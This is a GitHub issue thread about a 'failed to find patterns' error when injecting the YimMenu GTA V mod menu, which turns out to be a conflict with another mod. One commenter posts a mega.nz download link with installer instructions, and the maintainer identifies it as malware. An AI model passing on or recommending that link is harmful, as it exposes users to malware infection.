### ISSUE TITLE
[Build]: Failing to find Pattern for GTA when injecting yim menu.

### ISSUE THREAD

**Issue by ybwzz** [Yimura/YimMenu#3623]
### Describe the build issues

when i inject yim menu with xenon aready after 1 second i get a popup from yim menu saying "Failed to find some patterns for GTA5". Its not the Rockstar Games Louncher outdated i already reinstalled same thing. 

### Screenshots and/or Logs

![image](https://github.com/user-attachments/assets/0f5425be-a36a-43eb-b045-e959e9539447)

### IDE/Compiler

Visual Studio 2022

### Setup Guide

- [X] I confirm that I followed the setup guide correctly.

### YimMenu Source Code

- [X] I've confirmed this is an issue with building unmodified YimMenu.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ybwzz** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

why what does that do

**Comment by Yimura** [comment]
@ybwzz do you have any other mods installed on your game?

**Comment by Yimura** [comment]
> > Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."
> 
> why what does that do

Don't download that he's trying to spread malware.

**Comment by ybwzz** [comment]
> @ybwzz do you have any other mods installed on your game?
plenty like over 50 i think but thats fine.

**Comment by ybwzz** [comment]
sorry

**Comment by Yimura** [comment]
Yeah one of your mods is interfering with YimMenu, my guess it's menyoo, so try to uninstall that one.

**Comment by ybwzz** [comment]
> Yeah one of your mods is interfering with YimMenu, my guess it's menyoo, so try to uninstall that one.

okay ill do that wait a sec

**Comment by ybwzz** [comment]
yup it worked thanks, appreciate it

**Comment by ybwzz** [comment]
@Yimura  but now thats the thing i expected to happen again . now i cant open cherax menu anymore which workt perfecrtly fine before

**Comment by Yimura** [comment]
There are people out there that have co-loaded the two successfully, I don't know how but from this point on it isn't a YimMenu problem anymore.
